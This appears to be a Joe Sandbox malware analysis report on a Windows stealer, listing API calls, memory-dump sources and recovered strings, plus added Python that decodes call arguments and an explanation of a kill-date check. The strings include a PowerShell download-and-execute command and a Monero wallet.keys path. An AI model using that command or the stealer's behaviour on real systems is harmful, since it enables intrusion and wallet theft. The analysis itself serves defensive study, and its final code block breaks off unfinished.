                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction ID: b59b23398ba7f618ec0c78ec154abafcf179074e732ec5e45d75622acdeddcca
                                  • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction Fuzzy Hash: 4441C534A00228EFCF10EF68D884A9E7BB5FF4A314F14C175E918AB392D7399905CB91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006B501A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006B5021
                                  • InternetOpenA.WININET(006D0DE3,00000000,00000000,00000000,00000000), ref: 006B503A
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 006B5061
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 006B5091
                                  • InternetCloseHandle.WININET(?), ref: 006B5109
                                  • InternetCloseHandle.WININET(?), ref: 006B5116
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: d0037ca48470e672225bd566e1f95a8acac24cd8914b20b6f924028fc124961c
                                  • Instruction ID: a564ec3a98cf4aae8b683069f7e68bc1a164fc4e6d797d6a3f231c283e6b576e
                                  • Opcode Fuzzy Hash: d0037ca48470e672225bd566e1f95a8acac24cd8914b20b6f924028fc124961c
                                  • Instruction Fuzzy Hash: 7C31F9F4A44218ABDB20DF94DC85BDDB7B5AB48304F2081D9F609A7381D7706EC59F98
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0147E320,00000000,?,006D0E14,00000000,?,00000000), ref: 006C82C0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C82C7
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006C82E8
                                  • wsprintfA.USER32 ref: 006C833C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2922868504-3474575989
                                  • Opcode ID: 0ad7194c0f5041b8f9d90583ff6c206766a66ee9b32e0acf1c7f58f1d9314d53
                                  • Instruction ID: 93ce0f839d67a0ea713c0cee887d1f9ebac9264d3fb841597b97960189eeb307
                                  • Opcode Fuzzy Hash: 0ad7194c0f5041b8f9d90583ff6c206766a66ee9b32e0acf1c7f58f1d9314d53
                                  • Instruction Fuzzy Hash: 2021F7B1E58209ABDB10DFD4CC49FBEB7B9FB44B10F20451DF615AB280D778A9018BA5
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006C85B6
                                  • wsprintfA.USER32 ref: 006C85E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 006C860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C8629
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                  • RegQueryValueExA.ADVAPI32(00000000,0147E398,00000000,000F003F,?,00000400), ref: 006C867C
                                  • lstrlen.KERNEL32(?), ref: 006C8691
                                  • RegQueryValueExA.ADVAPI32(00000000,0147E3F8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006D0B3C), ref: 006C8729
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C8798
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C87AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 714c5e2a70384cdc7c6a96accecec0262f6958786e41a9806dbb66d6c86fff18
                                  • Instruction ID: 99dac7227c744b9bfd228769706bf5e01428b1e9b99c8379cf1cc7cbae07a792
                                  • Opcode Fuzzy Hash: 714c5e2a70384cdc7c6a96accecec0262f6958786e41a9806dbb66d6c86fff18
                                  • Instruction Fuzzy Hash: CA211B7191421C9FDB24DB94DC85FE9B3B9FB48704F1081D8E609A7280DF71AA85DFA4
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006C99C5
                                  • Process32First.KERNEL32(006BA056,00000128), ref: 006C99D9
                                  • Process32Next.KERNEL32(006BA056,00000128), ref: 006C99F2
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C9A4E
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 006C9A6C
                                  • CloseHandle.KERNEL32(00000000), ref: 006C9A79
                                  • CloseHandle.KERNEL32(006BA056), ref: 006C9A88
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: 3a1cb3f5522320bd3e7d3a4aea5ded342ac039cedf6f7d96c112f031d3610e79
                                  • Instruction ID: 33501061af02ae0349a753defc54c0eb2418fd6528896c22cc6b48647b22927d
                                  • Opcode Fuzzy Hash: 3a1cb3f5522320bd3e7d3a4aea5ded342ac039cedf6f7d96c112f031d3610e79
                                  • Instruction Fuzzy Hash: F521E971918218EBDB25DFA1DC8CBEDB7B5FB48700F104188E509A6290D7749A84DFA0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C7834
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C783B
                                  • RegOpenKeyExA.ADVAPI32(80000002,0146BE88,00000000,00020119,00000000), ref: 006C786D
                                  • RegQueryValueExA.ADVAPI32(00000000,0147E1D0,00000000,00000000,?,000000FF), ref: 006C788E
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C7898
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: ab14f75cb4b0a22cbd0b7e35b91ea914910b9a4fd29de27ea1a86bd09b854a65
                                  • Instruction ID: e76fdaec1e00107f03369674b94610413907acb05cee6054941e1f8f2fb778ec
                                  • Opcode Fuzzy Hash: ab14f75cb4b0a22cbd0b7e35b91ea914910b9a4fd29de27ea1a86bd09b854a65
                                  • Instruction Fuzzy Hash: FC01FF75A5D305BBEB00DBE4DD49FAEB779EB48700F104098FA15AB391D7709900DB90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C78C4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C78CB
                                  • RegOpenKeyExA.ADVAPI32(80000002,0146BE88,00000000,00020119,006C7849), ref: 006C78EB
                                  • RegQueryValueExA.ADVAPI32(006C7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 006C790A
                                  • RegCloseKey.ADVAPI32(006C7849), ref: 006C7914
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: bf3dbd7c1b5fb9cd661a77404e35a1f528ba5f36e6f0185378b2aea99c98224c
                                  • Instruction ID: 503bb596b34f536a6a37cfbd96751f755ed658082548c0cbd43ff1d1fe40c898
                                  • Opcode Fuzzy Hash: bf3dbd7c1b5fb9cd661a77404e35a1f528ba5f36e6f0185378b2aea99c98224c
                                  • Instruction Fuzzy Hash: 9F0117B5A58309BFEB10DBD4DC49FAEB778EB44700F104599F615A7391D7709A00DB90
                                  APIs
                                  • CreateFileA.KERNEL32(>=l,80000000,00000003,00000000,00000003,00000080,00000000,?,006C3D3E,?), ref: 006C948C
                                  • GetFileSizeEx.KERNEL32(000000FF,>=l), ref: 006C94A9
                                  • CloseHandle.KERNEL32(000000FF), ref: 006C94B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: >=l$>=l
                                  • API String ID: 1378416451-2925468272
                                  • Opcode ID: 01ffccc19f9223ec88c9f8bd04d26ed46e688d81f032626f641740abc999f7b8
                                  • Instruction ID: dbb967a2ea1c3e7dc4fb89b87747d2f6e9d19738531ac4c839f24b30b66dfa61
                                  • Opcode Fuzzy Hash: 01ffccc19f9223ec88c9f8bd04d26ed46e688d81f032626f641740abc999f7b8
                                  • Instruction Fuzzy Hash: F6F01D35E18208ABDB14DBF0DC49F9AB7BAAB48710F20C558FA11A7280D67496019B50
                                  APIs
                                  • memset.MSVCRT ref: 006C4325
                                  • RegOpenKeyExA.ADVAPI32(80000001,0147DAA0,00000000,00020119,?), ref: 006C4344
                                  • RegQueryValueExA.ADVAPI32(?,0147E5D8,00000000,00000000,00000000,000000FF), ref: 006C4368
                                  • RegCloseKey.ADVAPI32(?), ref: 006C4372
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C4397
                                  • lstrcat.KERNEL32(?,0147E488), ref: 006C43AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 43f793bef55e593054f1c939943c8ae1dd8c4c4439cbbd6e0a952ec88cfa51ad
                                  • Instruction ID: 1bb407c2f747368bafc325c0cc918dc566246abccd48c150b503c9cf455df19d
                                  • Opcode Fuzzy Hash: 43f793bef55e593054f1c939943c8ae1dd8c4c4439cbbd6e0a952ec88cfa51ad
                                  • Instruction Fuzzy Hash: D041A7F79101086BDB24EBA0EC56FFE733DAB88700F40455CB7165B181EE759A888BE1
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006BA13C
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 006BA161
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 006BA181
                                  • ReadFile.KERNEL32(000000FF,?,00000000,006B148F,00000000), ref: 006BA1AA
                                  • LocalFree.KERNEL32(006B148F), ref: 006BA1E0
                                  • CloseHandle.KERNEL32(000000FF), ref: 006BA1EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 1a2f78109d9b189bd302f1c4328c8e6360b519b66c6d6d42b553f12948b813a0
                                  • Instruction ID: 65ceebc6681282bd5b5cc8d2fd22f3f2514427f345acb34f6243a7e67907d00a
                                  • Opcode Fuzzy Hash: 1a2f78109d9b189bd302f1c4328c8e6360b519b66c6d6d42b553f12948b813a0
                                  • Instruction Fuzzy Hash: DC31FAB4A14209EFDB14CFE4D885BEEB7B6AF48304F108158E911A7390D774AA81DFA1
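The APIs lists in the function records above show every argument as a raw stack value (for example 80000002 and 00020119 in RegOpenKeyExA, 00000001 in OpenProcess, 00000002 in CreateToolhelp32Snapshot), so the access a function requests has to be looked up by hand. The following Python helper is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses these bullet lines and names the Win32 constants behind the registry, process and file calls, then derives coarse behaviour tags per function (process kill loop, 64-bit registry view, whole-file read). The two embedded records are copied from the function blocks above; the constant tables are standard Windows SDK values; the tags are the editor's own heuristics, not Joe Sandbox signatures.

```python
"""Decode the raw argument constants in Joe Sandbox 'APIs' lines into Win32 names.
Added example, not part of the report or the sample: records below are copied from the
function blocks above, constant tables are Windows SDK values, tags are analyst heuristics."""
import re
from typing import Dict, List, Optional, Tuple

# One record = the 'APIs' bullets of one function block, copied from the report.
RECORD_PROCESS_KILL = [
    "CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006C99C5",
    "Process32First.KERNEL32(006BA056,00000128), ref: 006C99D9",
    "Process32Next.KERNEL32(006BA056,00000128), ref: 006C99F2",
    "OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C9A4E",
    "TerminateProcess.KERNEL32(00000000,00000000), ref: 006C9A6C",
]
RECORD_BUILD_NUMBER = [
    "RegOpenKeyExA.ADVAPI32(80000002,0146BE88,00000000,00020119,006C7849), ref: 006C78EB",
    "RegQueryValueExA.ADVAPI32(006C7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 006C790A",
    "RegCloseKey.ADVAPI32(006C7849), ref: 006C7914",
]

# Bitmask tables, composites first so the greedy decoder reports KEY_READ rather than its parts.
REG_SAM = [(0xF003F, "KEY_ALL_ACCESS"), (0x20019, "KEY_READ"), (0x100, "KEY_WOW64_64KEY"),
           (0x200, "KEY_WOW64_32KEY"), (0x2, "KEY_SET_VALUE")]
PROCESS_ACCESS = [(0x1FFFFF, "PROCESS_ALL_ACCESS"), (0x1, "PROCESS_TERMINATE"), (0x8, "PROCESS_VM_OPERATION"),
                  (0x10, "PROCESS_VM_READ"), (0x20, "PROCESS_VM_WRITE"), (0x400, "PROCESS_QUERY_INFORMATION")]
TH32CS = [(0x2, "TH32CS_SNAPPROCESS"), (0x4, "TH32CS_SNAPTHREAD"), (0x8, "TH32CS_SNAPMODULE")]
GENERIC = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE")]
FILE_SHARE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
# Enumerations: exact match only.
HKEYS = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
# (API, zero-based argument index) -> (parameter name, table); a list is a bitmask, a dict an enumeration.
DECODERS = {
    ("RegOpenKeyExA", 0): ("hKey", HKEYS), ("RegOpenKeyExA", 3): ("samDesired", REG_SAM),
    ("OpenProcess", 0): ("dwDesiredAccess", PROCESS_ACCESS), ("CreateToolhelp32Snapshot", 0): ("dwFlags", TH32CS),
    ("CreateFileA", 1): ("dwDesiredAccess", GENERIC), ("CreateFileA", 2): ("dwShareMode", FILE_SHARE),
    ("CreateFileA", 4): ("dwCreationDisposition", DISPOSITION),
}
# Api.MODULE(args), ref: address -- the argument list is absent for some calls (wsprintfA.USER32 ref: ...).
LINE_RE = re.compile(r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{6,8})")


def decode_flags(value: int, table: List[Tuple[int, str]]) -> str:
    """Greedy bitmask decomposition; bits no table entry covers are kept as hex."""
    names, rest = [], value
    for bits, name in table:
        if (rest & bits) == bits:
            names.append(name)
            rest &= ~bits
    if rest or not names:
        names.append(f"0x{rest:X}")
    return "|".join(names)


def parse_arg(tok: str):
    """'?' -> None (unresolved), 8 hex digits -> int, anything else -> a string Joe Sandbox resolved."""
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok


def decode_line(line: str) -> Optional[Dict]:
    """Parse one 'APIs' bullet; None for lines that are not API calls."""
    m = LINE_RE.search(line)
    if not m:
        return None
    args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
    decoded = {}
    for idx, arg in enumerate(args):
        spec = DECODERS.get((m["api"], idx))
        if spec and isinstance(arg, int):
            name, table = spec
            decoded[name] = table.get(arg, f"0x{arg:X}") if isinstance(table, dict) else decode_flags(arg, table)
    return {"api": m["api"], "module": m["mod"], "ref": m["ref"], "args": args, "decoded": decoded}


def summarize(record: List[str]) -> List[str]:
    """One line per call with its decoded parameters, e.g. '006C78EB RegOpenKeyExA(hKey=HKEY_LOCAL_MACHINE, ...)'."""
    return [f"{d['ref']} {d['api']}(" + ", ".join(f"{k}={v}" for k, v in d["decoded"].items()) + ")"
            for d in map(decode_line, record) if d]


def tag_record(record: List[str]) -> List[str]:
    """Coarse behaviour tags (heuristics) derived from one function's decoded call set."""
    calls = [d for d in map(decode_line, record) if d]
    apis, tags = {c["api"] for c in calls}, []
    if "TerminateProcess" in apis and any("PROCESS_TERMINATE" in c["decoded"].get("dwDesiredAccess", "") for c in calls):
        tags.append("process-kill")
    if apis >= {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}:
        tags.append("process-enumeration")
    if any("KEY_WOW64_64KEY" in c["decoded"].get("samDesired", "") for c in calls):
        tags.append("registry-64bit-view")
    if apis >= {"CreateFileA", "GetFileSizeEx", "ReadFile"}:
        tags.append("read-whole-file")
    return tags


if __name__ == "__main__":
    for rec in (RECORD_PROCESS_KILL, RECORD_BUILD_NUMBER):
        print("\n".join(summarize(rec)), "->", tag_record(rec))
```

Run against the two embedded records it prints the RegOpenKeyExA call as hKey=HKEY_LOCAL_MACHINE, samDesired=KEY_READ|KEY_WOW64_64KEY (the sample reads the native 64-bit registry view from a 32-bit process) and the OpenProcess call as dwDesiredAccess=PROCESS_TERMINATE, which together with the Toolhelp enumeration gives the process-kill tag. Pointer arguments stay as addresses and unresolved slots stay None, so the decoder only names values at positions that are documented as flags or handles; extend DECODERS rather than guessing at other positions, since Joe Sandbox displays raw stack slots, not typed parameters.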
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: String___crt$Typememset
                                  • String ID:
                                  • API String ID: 3530896902-3916222277
                                  • Opcode ID: 37bc1c2909e935e3956a1c3bbfe9ee8929741e7faa2ac1192c06259cbbb40357
                                  • Instruction ID: 339ad56a415e5fc3f8662ab280cad5c1beb95e389ee9c86c20c9e8830b966db1
                                  • Opcode Fuzzy Hash: 37bc1c2909e935e3956a1c3bbfe9ee8929741e7faa2ac1192c06259cbbb40357
                                  • Instruction Fuzzy Hash: B541E3B010079C9EDB218B24CC85FFBBBEAEB45714F1444ECE98E96182E2719A459F64
                                  APIs
                                  • lstrcat.KERNEL32(?,0147E518), ref: 006C4A2B
                                    • Part of subcall function 006C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006C8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C4A51
                                  • lstrcat.KERNEL32(?,?), ref: 006C4A70
                                  • lstrcat.KERNEL32(?,?), ref: 006C4A84
                                  • lstrcat.KERNEL32(?,0146BAB8), ref: 006C4A97
                                  • lstrcat.KERNEL32(?,?), ref: 006C4AAB
                                  • lstrcat.KERNEL32(?,0147DA00), ref: 006C4ABF
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006C8F20: GetFileAttributesA.KERNEL32(00000000,?,006B1B94,?,?,006D577C,?,?,006D0E22), ref: 006C8F2F
                                    • Part of subcall function 006C47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006C47D0
                                    • Part of subcall function 006C47C0: RtlAllocateHeap.NTDLL(00000000), ref: 006C47D7
                                    • Part of subcall function 006C47C0: wsprintfA.USER32 ref: 006C47F6
                                    • Part of subcall function 006C47C0: FindFirstFileA.KERNEL32(?,?), ref: 006C480D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 44abc5c60d3ee3e35531678a6cfd1c38ce36c354318436322498f3671174adf4
                                  • Instruction ID: ede6831e7ad6394619204606fad9bde206bdd23fe208a2200c6b2f0e6b4448e1
                                  • Opcode Fuzzy Hash: 44abc5c60d3ee3e35531678a6cfd1c38ce36c354318436322498f3671174adf4
                                  • Instruction Fuzzy Hash: 123150F29042086BCB64EBB0DC99FED7339EB48700F40458DB25696151EE74EAC8CB98
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 006C2FD5
                                  Strings
                                  • <, xrefs: 006C2F89
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 006C2F14
                                  • ')", xrefs: 006C2F03
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 006C2F54
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: cb3b13f7229401c0fa7e073661fb276f6602a250ecea9f447dfcf84b91fc2b72
                                  • Instruction ID: b3fba601c116af789b9c27d85aaf8f63291d402d8db3043b47895f4fccf3f959
                                  • Opcode Fuzzy Hash: cb3b13f7229401c0fa7e073661fb276f6602a250ecea9f447dfcf84b91fc2b72
                                  • Instruction Fuzzy Hash: BE41D871D1020C9ADB54EBE0C8A2FFDBB7AEF14304F40455DE116AA192EF706A49CF99
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                  • String ID:
                                  • API String ID: 3136044242-0
                                  • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction ID: 85b000c856ac6bce3d7a29be5ccd86c683127b6e3a8b1efb36d97876565a1b37
                                  • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction Fuzzy Hash: 3B218E72D00678EBDB239F55ED4596F3A69EBA5B90F054119F80967211C3388D819BF0
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 006C6C0C
                                  • sscanf.NTDLL ref: 006C6C39
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006C6C52
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006C6C60
                                  • ExitProcess.KERNEL32 ref: 006C6C7A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 5d73907bd9eeb059396641d6bd863b6d127a5abc4fdaa4fc613cc08f52ed8970
                                  • Instruction ID: 33b40984d78d7e20cd98f82b726dd3407c80fb81836935c2e6c9e66cdd64a078
                                  • Opcode Fuzzy Hash: 5d73907bd9eeb059396641d6bd863b6d127a5abc4fdaa4fc613cc08f52ed8970
                                  • Instruction Fuzzy Hash: EF21BC75D14208ABCB44EFE4E845EEEB7B6FF48300F14856EF516A3250EB349604CB69
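The function above reads the clock with GetSystemTime, parses an embedded date with sscanf, converts both to FILETIME and ends in ExitProcess: a kill-date check, which is why the report's signature list notes that execution may stop after a time check. The comparison is done on FILETIME (100 ns ticks since 1601-01-01 UTC) because SYSTEMTIME fields cannot be compared directly. The following is an added example, not code from the report or the sample: it reproduces the conversion so an analyst can compute or reverse the values seen in a dump, and models the exit decision. The "YYYY-MM-DD" format is an assumption, since the report does not show the sscanf format string, and the sample dates are constructed, not taken from this analysis.

```python
import re
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000  # FILETIME resolution is 100 ns


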